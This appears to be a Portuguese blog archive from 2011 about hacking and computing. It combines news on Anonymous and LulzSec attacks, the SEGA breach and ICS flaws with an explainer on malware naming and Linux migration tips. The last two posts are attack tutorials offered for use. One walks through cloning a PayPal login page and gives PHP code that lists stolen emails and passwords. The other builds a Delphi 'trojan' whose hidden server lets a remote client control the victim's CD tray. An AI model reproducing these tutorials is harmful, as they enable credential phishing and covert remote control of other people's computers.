A detenção veio em resposta a uma queixa da autoridade das telecomunicações da Turquia, cujo site foi derrubado na quinta-feira como parte de um protesto do Anonymous contra o que o grupo chama de censura do governo sobre a Internet.
O partido que atualmente governa a Turquia, o AK Party, venceu uma votação parlamentar no domingo e pretende inaugurar um novo sistema de filtragem de conteúdo na Internet em agosto. Com ele, usuários terão que escolher um dos quatro filtros ao acessar a Web --doméstico, familiar, para crianças ou normal.
O Anonymous, um grupo ativista libertário que atacou muitos sites, incluindo o da Amazon e o da Mastercard em nome da liberdade na Internet, afirmou que o sistema permitirá que se monitore a atividade das pessoas na rede.
Oito dos 32 suspeitos de ciberativismo detidos no domingo são menores de idade, afirmou a Anatolian.
A operação policial na Turquia ocorre após a detenção de três pessoas na Espanha na sexta-feira sob suspeita de organizar ciberataques contra os sites da Sony, de bancos e governos.

Hackers atacam servidores da SEGA


SEGA enviou um email para todos os seus clientes com uma notícia nada agradável: de acordo com a empresa, a casa do Sonic é a mais nova vítima dos hackers. De acordo com o comunicado, todas as páginas do SEGA Pass foram invadidas, o que significa que informações contidas em fóruns e áreas de imprensa foram comprometidas.
No entanto, a companhia afirmou que nenhum dado confidencial foi roubado e que conteúdo financeiro não foi afetado. Além disso, embora todas as senhas estivessem criptografadas, há um pedido para que os usuários alterem as combinações de suas contas para evitar qualquer tipo de problema.
Este não é o primeiro caso de invasão de banco de dados registrado no último mês. Desde a queda da PSN, empresas como BethesdaCodemasters e Epic Games também foram alvos de hackers. No entanto, nenhum grupo assumiu a autoria do recente ataque.
Você pode acompanhar a evolução dos ataques cibernéticos no mundo dos jogos por meio deste link.

Falha em software chinês causa vulnerabilidade em infraestrutura

O Departamento de Segurança Interna dos EUA está cuidando do caso. 
Reuters. Por Jim Finkle - Um software amplamente utilizado na China para ajudar a acionar sistemas de armas, usinas e fábricas de produtos químicos possui falhas que hackers poderiam explorar para danificar a infraestrutura pública, de acordo com o Departamento de Segurança Interna dos Estados Unidos.
O departamento divulgou na quinta-feira um relatório em que alerta sobre as vulnerabilidades dos aplicativos produzidos pela Sunway ForceControl Technology, de Pequim, que poderiam ser explorados por hackers para o lançamento de ataques contra infraestrutura essencial.
Os produtos da Sunway, amplamente utilizados na China, também são empregados em menor escala em outros países, entre eles os EUA, informou a equipe de resposta de emergência sobre sistemas de controle industrial do departamento norte-americano.
"Trata-se de vulnerabilidades que hackers poderiam aproveitar para causar destruição," disse Dillon Beresford, pesquisador do grupo privado de segurança NSS Labs, que descobriu as falhas.
O relatório norte-americano surge em meio a uma onda de ataques de alta visibilidade por hackers contra alvos como Fundo Monetário Internacional (FMI), Citigroup e Sony. Os ataques tinham por objetivo primário o roubo de dados, e apenas em alguns casos houve ataques a infraestrutura essencial.
No ano passado, o worm Stuxnet surgiu para ataques contra os sistemas de controle industrial produzidos pela Siemens. Especialistas em segurança, em geral, acreditam que o worm tenha sido criado como parte de um ataque, promovido por um país, contra o programa nuclear iraniano.
O Irã informou que o worm foi usado para atacar os computadores de sua central nuclear em Bushehr. Houve especulações generalizadas de que o Stuxnet tenha de fato causado danos ao complexo, o que o Irã nega.
Beresford cooperou com a Sunway, as autoridades chinesas e o Departamento de Segurança Interna a fim de corrigir as falhas que identificou. A Sunway desenvolveu atualizações de software que corrigem os problemas, mas pode demorar meses para que todos os clientes as instalem, disse ele.

quinta-feira, 23 de junho de 2011

Grupo LulzSec tem braço brasileiro e já derrubou páginas governamentais

Fonte da Imagem: Twitter @LulzSecBrazil
O LulzSec, um dos grupos de hackers que invadiu sites da Sony e de outros serviços nos últimos meses, aparentemente tem o que pode ser chamado de “filial” no Brasil e já atacou sites governamentais brasileiros.
No início da madrugada desta quarta-feira (22), o Twitter @LulzSecBrazil anunciou que os "alvos" brasil.gov.br e presidencia.gov.br estavam “abaixo”. As páginas ficaram efetivamente fora do ar por alguns minutos. O grupo internacional respondeu o feito: “Nossa unidade brasileira está fazendo progresso. Bem feito, irmãos @LulzSecBrazil!”.
Por meio de uma nota oficial, a Secretaria de Imprensa da Presidência da República informou nesta quarta-feira que o Serviço Federal de Processamento de Dados (Serpro) "bloqueou todas as ação dos hackers, o que levou ao congestionamento das redes, deixando os sites indisponíveis durante cerca de uma hora" e que "os dados e informações destes sites estão absolutamente preservados".

Site da Petrobrás também foi derrubado

Por volta das 13h horas desta quarta-feira (22), o twitter do LulzSecBrazil anunciou que a página da Petrobras havia sido derrubada. Até o momento desta atualização, o site não estava acessível.
"Acorda Brasil! Nao queremos mais comprar combustivel a R$2.75 a R$2.98 e expotar a menos da metade do preco! ACORDA DILMA!", dizia a postagem seguinte (a reprodução mantém os erros de português da mensagem).
Anúncio que a página da Petrobras foi derrubada. (Fonte da imagem: Twitter LulzSecBrazil)

Ataques anunciados

A primeira postagem do @LulzSecBrazil data de 18 de junho. Na segunda postagem, a ameaça: “Se conseguirmos 1.000 followers até amanhã, iremos invadir o www.brasil.gov.br”. O número não foi conseguido em um dia, mas a ameaça foi mantida. Uma postagem do dia 19 de junho afirmava que “de acordo com análises feitas recentemente, o site do governo não é tão fraco quanto eu achava. Mas a investida continua...”.
O LulzSecBrazil utiliza o IRC para comunicação e, de acordo com um tweet, atualmente o grupo conta com membros de diversos estados do Brasil. Em poucos dias de atividade, o perfil do Twitter afirmou que a causa do grupo “é apenas derrubar sites ligados ao governo” e apontou que muitos desses sites têm falhas grandes de segurança.

 
O grupo também tem uma página com domínio brasileiro (lulzsecurity.com.br). No entando, a página está suspensa pelo serviço de hospedagem. Uma das postagens é um vídeo intitulado “Mensagem ao povo brasileiro”, onde, entre outras passagens, o grupo afirma que “a posição do Anonymous é a de que, quando há um conflito de interesses entre o governo e as pessoas, é a vontade do povo que deve prevalecer.
A única ameaça que a transparência oferece aos governos é a ameaça da capacidade de os governos agirem de uma forma que as pessoas discordariam, sem ter que arcar com as consequências democráticas e a responsabilização por tal comportamento.”


 


A era dos hackers: confira uma linha do tempo dos ataques à indústria de games

(Fonte da imagem: Webtuga)O ataque dos hackers do grupo Anonymous aos servidores da PlayStation Network foi apenas o primeiro de uma série de crimes relacionados, que têm como principal alvo a indústria de games. Desde abril, quando a PSN saiu do ar, diversos sites de desenvolvedoras também foram invadidos ou retirados da internet. E tudo começou em defesa de uma única pessoa: George “GeoHot” Hotz.
O hacker, famoso por ter sido o primeiro a desbloquear completamente o iPhone, também foi um dos poucos a conseguir ultrapassar a grande barreira de segurança do PlayStation 3. Após abrir o console para a utilização de aplicativos não-oficiais (e também para a pirataria), Geohot sofreu diversos processos movidos pela Sony, que terminaram em um acordo extra-judicial.
O grupo de hackers Anonymous, que prega a liberdade na internet e protesta contra grandes corporações, lançou uma série de ataques de negação de serviço contra os servidores da empresa. O golpe consiste em sobrecarregar o servidor com solicitações até retirá-lo do ar. E foi exatamente isso que aconteceu: a PlayStation Network passou quase um mês offline.
O ataque também resultou na exposição de informações de identidade, endereços e dados bancários de cerca de 30 milhões de cadastrados na PSN em todo o mundo. Além disso, gerou uma série de problemas financeiros e judiciais para a Sony, já que ficou provado que a empresa não tinha segurança suficiente para suportar golpes dessa magnitude.
Recentemente, 35 membros do Anonymous foram presos na Espanha e Turquia, acusados de crimes relacionados aos ataques contra o mercado de games. O grupo, claro, já iniciou uma campanha de retaliação aos dois governos, com ataques a sites de embaixadas e outros órgãos públicos.

Um novo desafiante entrou no ringue

A repercussão negativa dos ataques à PSN fez com que o Anonymous repensasse sua estratégia e passasse a trabalhar com protestos mais pacíficos. Entra em cena, então, o Lulzsec, grupo dissidente que afirma ter declarado guerra à Sony. A equipe começou invadindo sites dos braços cinematográfico e fonográfico da empresa na Europa e Estados Unidos.
Foram eles também os responsáveis por invadir os sites da Bethesda – em uma tentativa de adiantar o lançamento de The Elder Scrolls V: Skyrim – e Nintendo of America. De acordo com o grupo, as invasões são feitas “apenas por diversão” e não tem como objetivo o roubo de dados ou a utilização criminosa das informações obtidas.
Img_normalOntem, o Lulzsec lançou um ataque contra os servidores dos games Eve OnlineMinecraft e League of Legends. Dezenas de milhares de usuários dos títulos ainda se encontram sem poder logar com suas contas pagas. O próximo alvo do grupo seria a Blizzard e, bem possivelmente, o MMORPG World of Warcraft.
Além de tudo isso que já foi citado, os sites oficiais das desenvolvedoras Codemasters eEpic Games também foram atacados recentemente, assim como a página do game Deus Ex: Human Revolution, da Square Enix. Apesar de não existirem provas, os crimes são atribuídos a braços dissidentes do Anonymous e/ou do Lulzsec.
Linha do tempo de invasões (até agora)

domingo, 19 de junho de 2011

‘Genética’ dos vírus indica comportamento das pragas virtuais

Se você desconhece o nome das pragas de computador, possivelmente não saberá de imediato como reagir quando seu antivírus alertar sobre o JS/Downloader.gen, o W32.Netsky.a@mm ou o Backdoor.HackDefender. No entanto, a existência de alguns padrões permite que, apenas pelo nome, o usuário tenha uma boa ideia do comportamento desses códigos maliciosos. A coluna de hoje decifra a “genética” dos nomes de vírus, para facilitar a identificação dessas pragas.

Decifrando os termos em nomes de pragas
Cada antivírus usa termos diferentes em seus nomes. A barra na tabela abaixo separa alguns termos iguais que são escritos de forma diferente. Esses termos podem ser prefixos (vir antes da família) ou sufixos (depois). Com base na tabela abaixo, por exemplo, dá para saber que o W32.HLLW.Lovgate@mm é uma praga da família Lovgate e que ela foi programada em uma linguagem de alto nível para se espalhar pela rede e por e-mail. Confira:
@m Envia e-mails para se espalhar. Exemplo: W32/Ska@M
@mm/Email-Worm/I-Worm Envia grande quantidade de e-mails para se espalhar. Exemplo: Email-Worm.Win32.Sober.c
! e outros sufixos não-variante Utilizado para dar informações adicionais. Por exemplo, um “Algumvírus.dam” significa um arquivo danificado, enquanto um “Algumvírus!dll” se refere a um componente DLL do vírus especificado na família. Exemplo: W32/Pinkslipbot!dll
Backdoor Permite o controle do PC pelo criador da praga. Exemplo: Backdoor.SubSeven
Downloader/Dldr Instala arquivos no PC, baixados da internet. Exemplo: Downloader.Trojan
Dropper/Drop/Dr Instala arquivos no PC sem precisar baixar nada. Exemplo: Trojan-Dropper.Win32.Yabinder.a
Exploit Código usado somente para explorar falha de segurança (raramente usado para vírus que exploram falhas). Exemplo: Exploit-MS04-028
Gen Vírus genérico, sem variante. Quando há muitas variantes de uma praga, ou quando não vale a pena catalogá-la sob uma família nova, usa-se o “gen”. Exemplo: Win32:trojan-gen
HLLC/HLLW/HLLP/HLLO (Vírus de Companhia, Rede, Parasita, Destruidor de arquivos, respectivamente) Estes termos têm caído em desuso. Significam que o vírus foi programado em uma linguagem de alto nível. Fazia sentido antigamente, mas hoje todos os vírus são feitos em alto nível. O mais relevante é o HLLO, que significa um vírus que destrói arquivos de maneira irreparável. Exemplo: W32.HLLO.Videoinf
Joke Um programa não malicioso, mas que prega uma “peça”. Exemplo: Joke.Win32.VB.h
JS/HTML/VBS É um código em formato script (texto – o normal é binário, código) que faz uso da referida linguagem (Javascript, HTML, VBScript…). Exemplo: VBS.LoveLetter
M (Macro)
MS/O (Office)
W (Word)/A (Access)/X (Excel)
São vírus de macro do Microsoft Office. Raríssimos hoje. São combinações dessas letras que dão o significado. Por exemplo, OM é “Office Macro”. A2KM é “Macro do Access 2000”. X97M é “Macro do Excel 97” e assim por diante. Exemplo: W97M.Melissa.A
PUP/PUA Programa Potencialmente Indesejado (acrônimo do inglês: potentially unwanted program/application). Exemplo: Generic PUP.x!06F91978
PE Usado por poucas companhias antivírus. PE significa “Portable Executable”, ou seja, programas. Significa que o vírus infecta programas ou é um programa. Exemplos: NewHeur_PE; PE_WINDANG
Proxy Abre um proxy no computador, normalmente de e-mails. Com isso, o criador da praga pode enviar e-mails ou navegador na web pelos computadores infectados. Exemplo: Trojan-Proxy.Win32.Mitglieder.a
PWS/PWSteal/Infostealer Rouba senhas ou outras informações valiosas. Exemplo: PWS-Mmorpg.gen
Spy Faz algum tipo de espionagem no computador. Exemplo: Trojan-Spy.Win32.Banker
Trojan/Troj Praga que, de modo geral, não se espalha sozinha e, por isso, é “semeada” por seu criador. Exemplo: Troj/Ransom-A
W32/Win32 É uma praga que ataca sistemas Windows. Praticamente irrelevante hoje, mas antigamente se usava muito para diferenciar dos vírus de DOS. Ainda se usa em alguns casos, especialmente em pragas clássicas. Exemplo: W32.Blaster.Worm
I-Worm/Worm/P2P Um vírus que ataca pela rede. No caso de P2P, redes de trocas de arquivo. I-Worm aparece aqui novamente, porque algumas empresas usam tanto para um quanto para outro. Exemplo: P2P-Worm.Win32.Tibick
Às vezes esses termos fazem parte da própria família do vírus. E em alguns casos, a família do vírus poderá dar a informação que falta. Por exemplo: não é difícil deduzir que tipo de informação o “Infostealer.Bancos” rouba, ainda mais com o nome em português.
O caos da nomenclatura
As empresas antivírus não conseguem padronizar o nome dos vírus. Os motivos não são claros, mas muitos especialistas afirmam que o problema é a quantidade de pragas – por serem muitas, é difícil usar o mesmo nome que todas as demais empresas. Um texto sobre nomenclatura da WildList afirma que é “impossível” fazer com que todos os produtos antivírus usem o mesmo nome para as mesmas pragas.
Em 1991, foi criada a Nova Convenção de Nomenclatura de Vírus (New Virus Naming Convention, NVNC). Ela não busca padronizar os nomes, mas sim as informações que deveriam estar nele e como elas seriam dispostas. Além de ser antiga e não contemplar as técnicas usadas por pragas mais novas, ela não é seguida à risca e, por isso, existem diferenças não apenas nomes, mas em como eles são escritos.

Site do CME agora fica na web apenas como arquivo, porque o projeto foi abandonado. (Foto: Reprodução )

Um projeto chamado Common Malware Enumeration (CME) – Numeração de malware Comum – foi iniciado em 2004 para criar um “identificador único” que todos os antivírus pudessem usar, mas apenas quando necessário, em infecções de escala mundial. O jornalista Robert Lemos, do site SecurityFocus, da Symantec, observou em 2006 que “as companhias antivírus parecem menos propensas a cooperar quanto mais atenção da mídia um vírus ganha”.
Como o CME buscava apenas catalogar pragas de alta relevância e grande parte dos especialistas acredita que a era dos “grandes vírus” acabou, decidiu-se dar fim ao projeto em janeiro de 2007. Porém, houveram muitas infecções em larga escala desde 2007. É fácil citar o Conficker, que recebeu até cobertura de emissoras de televisão em abril deste ano.
Não é nada intuitivo o fato de as pragas Conficker, Downadup e Kido serem as mesmas. Mas as empresas antivírus deram um “jeitinho”: as páginas informativas a respeito das pragas trazem também os nomes usados pelos concorrentes.
Resumindo, se você quiser saber os outros nomes de um determinado vírus, terá de buscar isso na internet para descobrir os “aliases” do código malicioso. Não tem outro jeito, e o consenso entre as companhias antivírus parece ser de que padronizar os nomes é impossível.
Variantes e Famílias

Vírus cujo código parece ter uma fonte comum são colocados na mesma família como variações. São as ‘variantes’. (Foto: Reprodução)

A família é o nome do vírus. No caso do Conficker, temos um vírus da família… Conficker. Para se referir a um vírus específico, é preciso especificar a variante que, hoje em dia, é determinada por uma letra. Conficker.C, por exemplo, é a terceira variante da família Conficker. Depois do “Z” vem o AA (27ª variante), AB, AC… AZ, BA, BB… ZZ, AAA e assim por diante.
Devido ao problema explicado acima, existem casos em que a variante (“C”, no nosso exemplo) de uma empresa antivírus não seja a mesma da outra.
Antigamente, e ainda em alguns casos mais atuais, usa-se como variante o número de bytes (tamanho) do vírus. Mas isso é raro, porque a já mencionada NVNC determinou esse método das letras.
Agora que você já sabe tudo isso, o que é o “JS/Downloader.gen”? Como se espalha o W32.Netsky@mm? Fácil saber, não é? Existem ainda outros sufixos e prefixos além dos citados, mas muitas vezes o significado explica-se por si mesmo. Veja o caso de “Linux.RST”. o que se sabe é apenas que trata-se de um vírus que ataca o Linux. Ou então um “Riskware”, que é apenas “software de risco”.
É importante ressaltar que nem sempre todos os nomes são usados no caso de um vírus que faz mais de uma coisa. Por exemplo, uma praga que rouba dados e permite o acesso remoto do PC dificilmente vai receber o nome de “Backdoor.PWS.[Nome]”. Você consegue geralmente descobrir o comportamento principal da praga, conforme julgado pela companhia antivírus, mas não todos os detalhes!
Nomes curiosos de famílias
A convenção de 1991 (NVNC) impõe uma série de restrições no que pode ser usado como nome do vírus (“família”). Com isso, pesquisadores antivírus precisam usar um pouco a criatividade para nomear as pragas. Abaixo segue a origem de alguns nomes de pragas conhecidas:
1) Conficker: o nome foi obtido com o reordenamento de algumas letras de “Traffic Converter”, segundo o especialista da Microsoft Joshua Phillips. O site trafficconverter.biz era usado pela praga para baixar atualizações.
2) Netsky: o nome é uma inversão de “skynet”. O termo, retirado do filme “Exterminador do Futuro”, estava no código do vírus. A praga dizia-se um “Skynet Antivírus”. De fato, o código malicioso eliminava pragas “concorrentes” da época, como o MyDoom e o Beagle.
3) Chernobyl: deriva da data de ativação, 26 de abril, a mesma do acidente da usina nuclear de mesmo nome. O vírus também ficou conhecido como CIH devido às iniciais do seu criador (Chen Ing Hau) e Spacefiller, por causa da técnica de infecção (ele preenchia os espaços em branco dentro de um arquivo – por isso space (espaço) filler (“enchedor”).
4) Nimda: a palavra “admin”, de “administrador”, ao contrário.
5) Blaster: este vírus teve seu nome derivado do arquivo malicioso que instalava no PC, o “msblast.exe”. Algumas o empresas o chamavam também de MSBlast.
6) Sasser: origina-se no componente do Windows que o vírus explorava para se espalhar, o “lsass.exe”. Tirando-se o “l” do arquivo e colocando-se o “er” – um sufixo comum no inglês –, têm-se “sasser”.
7) HackDefender: a indústria de antivírus tenta evitar o uso do nome escolhido pelo criador da praga, para não legitimá-lo. Como o nome original era “Hacker Defender”, retirou-se apenas duas letras. O Hacker Defender é um poderoso cavalo de troia, que “protege” outras pragas contra detecção e remoção.
Nem sempre as empresas informam diretamente o motivo por trás do nome, mas é comum que palavras tenham suas letras invertidas, cortadas ou rearranjadas de alguma forma. Se a descrição do vírus mencionar a presença de algum termo que se assemelhe com o nome, provavelmente está ali a sua origem.

Migração de desktop Windows para Linux: Como fazer?


Liste os principais motivos que levam uma migração a falhar e você terá, entre as principais razões, a grande resistência às novas rotinas no uso do sistema. O mito do “é difícil” parece dominar a mente dos usuários.
A verdade, porém, é outra; se pensar bem, também demorou para você se acostumar com o sistema que utiliza agora.
Lá vão algumas dicas de como lidar melhor com a mudança de sistemas operacionais.
1. Garanta o apoio da direção
Desnecessário dizer, não? Se a gestão de TI for capaz de arregimentar executivos de alto escalão dentro da organização para apoiar a mudança, poderá encontrar menor resistência entre os colaboradores com medo do pingüim.
2. Qual distribuição escolher?
Antes de tudo é necessário descobrir a distribuição acertada entre as centenas de versões do software livre disponíveis no mercado. É importante atentar para as habilidades os usuários, para os conjuntos de hardware da empresa e qual será a aplicação. Também devem ser levantadas as opções de suporte disponíveis para cada distribuição.
No caso de usuários com nenhuma experiência no sistema Linux, a sugestão é adotar distribuições como Ubuntu ou a Linux Mint – a não ser que existam sérios motivos para não partir para tais distribuições, vale a pena avaliar essas plataformas.
Se a dependência de sistemas Windows for enorme, a distribuição Zorin OS reproduz a interface a e dinâmica do sistema das janelas da Microsoft. As distribuições Slackware ou Arch Linux, são aconselhadas apenas para usuários com extensa experiência em sistemas Linux.
Se não tem certeza de que distribuição é mais acertada, pode consultar o site da Zegenie para fazer uma avaliação gratuita de qual distribuição é a mais apropriada para você e sua empresa. O teste ocorre online e leva poucos minutos.
3. Escolha a interface apropriada
A enorme variedade de interfaces gráficas para sistemas desktop Linux traz diferentes recursos. Na distribuição atualmente mais conhecida, Ubuntu, a interface padrão é a GNOME, mas existem outras como o KDE.
É aconselhado experimentar as diferentes interfaces antes de tomar uma decisão. Todavia, migrar entre as interfaces não traz qualquer problema maior, pois são apenas atalhos dos comandos normalmente executado nas linhas de comando, com exceção para os aplicativos que rodam apenas no modo gráfico.
4. Aplicativos
Provavelmente muitos dos aplicativos usados na corporação atualmente sejam de plataformas diferentes. Para adiantar o processo de migração, é sugerido que se comece a introduzir novas interfaces aos usuários.
Se estes, por exemplo, estão acostumados a usar o Internet Explorer, pode ser uma boa tática apresentar-lhes os browsers Chrome ou Firefox enquanto ainda operam os sistemas Windows.
Como a suíte Microsoft Office não é disponível para a Plataforma Linux e usar o emulador de Windows Wine para dar conta do uso desse pacote implica em mais um aplicativo que consome memória considerável, é aconselhado iniciar programas de capacitação no uso do OpenOffice.
Assim que a migração do Windows para o Linux estiver completa, os colaboradores sentirão pouca diferença entre os ambientes.
5. Não pressionar
Assim que decidir experimentar o sistema Linux, é aconselhado que seja instalada uma máquina para fins de teste com todos os aplicativos pretendidos. Esse PC pode ser posicionado dentro da empresa e ser de livre acesso dos colaboradores.
Uma boa opção é deixar alguns joguinho instalados para não fazer do sistema uma tortura. Incentivar que os funcionários deem uma “brincada” no sistema para perder o medo e, principalmente, informarem o que lhes agrada ou incomoda no sistema é altamente aconselhado.
6. Um guia de uso
Essencial para auxiliar os colaboradores na hora de realizar as tarefas que rotineiramente executavam no Windows.
Simples assim como: Em vez de usar o Internet Explorer, use o Chrome ou o Firefox; ou, para editar textos, clique no ícone OpenOffice de sua área de trabalho.
Se a tarefa de preparar a migração parecer muito complicada, sempre poderá lançar mão de serviços de consultoria ou ler sobre o assunto. Mas um pouco de preparo e uma escolha acertada são uma excelente maneira de começar.

Páginas Fakes, Como fazer e como se proteger.



Olá a todos, neste tutorial eu vou ensinar vocês a fazer uma página fake e como não cair nestas farsas. Para uma melhor compreensão recomendo conhecimento em PHP e MySQL
No tutorial eu vou utilizar como exemplo o paypal, mas pode ser adaptado para todos os sites.
Mão a massa. Primeiramente você deve escolher qual site você vai fazer a página fake. Ex.: Orkut, Facebook, Paypal, AlertPay, Baixaki e etc.
Escolhido o site, abra-o em seu navegador. Você precisa fazer uma cópia da página, para tanto, aperte em “ARQUIVO” – “SALVAR COMO” e salve a página.(Caso a página principal não seja a do login, então salve apenas a página do login)
Agora abra a página que você salvou com o seu editor de texto favorito.
Você precisa mudar o form para um script que você ira fazer afim de salvar os dados transmitidos. No caso do paypal, procure a linha:
Edite-a mudando o endereço do form. Marque o que está escrito no “name” nas linhas do input:


Salve as alterações e vamos para o banco de dados(Espero que você saiba trabalhar com banco de dados).
Crie um banco com o nome “fakepaypal”, dentro dela adicione a tabela “usuario”, esta tabela tem que ter uma linha para o “email” e outra para a “senha”.
Agora você tem que escrever o script que vai pegar estes dados e colocar no banco de dados, um exemplo:
Esta quase pronto, agora falta o script que vai ler o banco de dados, um exemplo:

$local=”localhost”;
$banco=”fakepaypal”;
$usuario=”root”;
$senhabanc=”";
$cnx=@mysql_connect($local,$usuario,$senhabanc);
mysql_select_db($banco);
$sql=”SELECT * FROM usuario”;
$result=mysql_query($sql);
$lin=mysql_num_rows($result);
for($i=0;$i<$lin;$i++)
{
$reg=mysql_fetch_row($result);
echo “Email: $reg[0] Senha: $reg[1]
“;
}
?>
Como se proteger!
Mas para você usuário não cair nessa das páginas fakes, a maior dica é analisar o endereço, tenha certeza que o endereço é o do site que você busca. Outra dica é analisar as fotos e textos que informam a data, se a data tiver meio “antiga”, desconfie.
Sites importantes como o paypal, raramente acesse-os através de links.
Vídeo do youtube com um vídeo que eu fiz fazendo uma página fake do orkut: clique aqui
Então é só isto, espero que tenha gostado.

sábado, 18 de junho de 2011

Como montar um trojan em Delphi sem saber nada!

Bom galera, vou ensinar a cada como fazer um trojan, em Delphi, mesmo se você baixou o Delphi ontem você vai conseguir fazer esse trojan… É assim… Este é um trojan básico…

1º Passo -> Você tem o Delphi? Se não, será necessário baixá-lo.

2º Passo -> Abra o Delphi. Clique em Component, depois em vá em Install Packages…

Depois cliques em Add….

Em Filename coloque isso e depois clique em Open:

%programfiles%\Borland\Delphi7\Bin\dclsockets70.bpl

Ou o diretório do seu delphi + \Bin\dclsockets70.bpl. Isso serve para adicionar os componentes que serão necessarios para seu Trojan…

3º Passo -> Agora mãos a obra! Vá na paleta Standard e adicione 4 Buttons

Agora… insira um Edit que está na paleta Standard também

Depois insira um ClientSocket que está na paleta Internet.

Clique em um dos botões, e na parte esquerda, procure pela janela que o titulo é Object Inspector e depois procure por Caption.

E altere o conteudo da sua direita para Conectar, repita isso com os outros três botões, só que ao invés de colocar Conectar, coloque:
Desconectar, Abrir CD e Fechar CD.

Agora clique no Edit e vá na mesma janela anterior, só que dessa vez procure por Text. E remove o conteúdo da direita.

De uma arrumada na posição dos objetos a seu gosto… E lembresse, o Client Socket não vai aparecer… Eu arrumei assim:

4º Passo -> Agora que já fizemos a interface do Cliente, vamos codar! De dois cliques no botão Conectar. Abrirá uma nova janela, nela… escreva abaixo de begin isso:

ClientSocket1.Host := Edit1.Text;
ClientSocket1.Port := 1234;
ClientSocket1.Active := True;

Explicando… a primeira linha… vai definir o IP que você vai atacar, como o texto do edit que você inseriu, a segunda linha, vai definir como a porta a ser aberta, como 1234, e a terceira se conectará.

Agora vá a janela anterior… E de dois cliques no botão Desconectar, e coloque isso:

ClientSocket1.Active := False;
ClientSocket1.Close;

Explicando… a primeira linha… vai desconectar o Cliente do servidor, e a segunda… vai fechar o cliente.

Volte a janela anterior e dê dois cliques no botão Abrir CD, e coloque isso:

ClientSocket1.Socket.SendText('1');

Explicando… essa linha fará com que o Client Socket, envie o texto com o número 1 para o servidor, e lá, esse texto será reconhecido…

Volte novante a janela anterior, dê dois cliques no botão Fechar CD, e coloque isso:

ClientSocket1.Socket.SendText('2');

Explicando… ele faz a mesma coisa que o comando anterior, só que, ao invés de mandar um texto com o número 1 ele vai mandar um texto com o número 2.

Pronto cliente terminado,agora só falta o Server, então salve o programa clicando em File, depois em Save all e salve aonde você quiser.

Depois que salvar clique em Project depois Compile Project1

Depois clique em File, depois Close All

Clique em File, depois New, depois Application

Vá na paleta Internet e de dois cliques em ServerSocket

Agora de um clique nele, e vá na janela Object Inspector, e mude a Port para 1234

Agora, ainda na Object Inspector, mude o Active para True

Novamente em Object Inspector, clique em Events

Depois de dois cliques em OnClientRead

Na nova janela que apareceu, apague o begin e coloque isso:

var
Kingcaio : String;
begin
Kingcaio := Socket.ReceiveText;
if Kingcaio = '1' then
MciSendString('Set CdAudio Door Open',nil,0,Handle)
else if Kingcaio = '2' then
MciSendString('Set CdAudio Door Closed',nil,0,Handle);

Explicando… A 2ª linha vai definir a variante Kingcaio como uma string, a 4ª define a String Kingcaio como sendo igual a Socket.ReceiveText, que por sua vez significa ao texto recebido, a 5ª vai dizer tipo assim: “Se o texto recebido for igual a 1 faça isso, mas se não for siga em frente”, a 6ª é o comando para abrir o CD-ROM, a 7ª linha tem a mesma função que a 5ª linha, e por final a 8ª linha, é o comando para fechar o CD ROM.

——————————————————————————————————————————————————-

Agora… ainda nessa janela suba a barra de rolagem até achar alguma coisa assim:

uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, ScktComp;

Logo após de ScktComp coloque MMSystem ficando igual a seguinte foto:

——————————————————————————————————————————————————-

Certo… clique em Project depois em View Source, aparecerá uma nova janela, procure por Application.Initialize;, escreva logo abaixo dessa linha isto:

Application.ShowMainForm := False;

Que servirá para que a pessoa não veja a janela…

——————————————————————————————————————————————————-

Agora clique em File e depois em Save All e salve em qualquer lugar…

——————————————————————————————————————————————————-

Logo em seguida clique em Project em seguida Compile Project1.

——————————————————————————————————————————————————-

Pronto! Acabou! Agora vamos testar para ver se deu certo! Dê dois cliques no executável do server, depois no executavel do cliente, no edit que você inseriu coloque isso:

127.0.0.1

Que é o endereço de LoopBack, ou seja, é a mesma coisa que se você digitasse seu próprio IP, e logo em seguida clique em Conectar, e teste os comandos… Deu certo? Acho que sim!

Espero que tenham gostado… Comentem!^^

Créditos: 100% By Lucas, From HazardSource.comhttp://hazardsource.com/forum/

OBS.: Caso copie, deixe os créditos…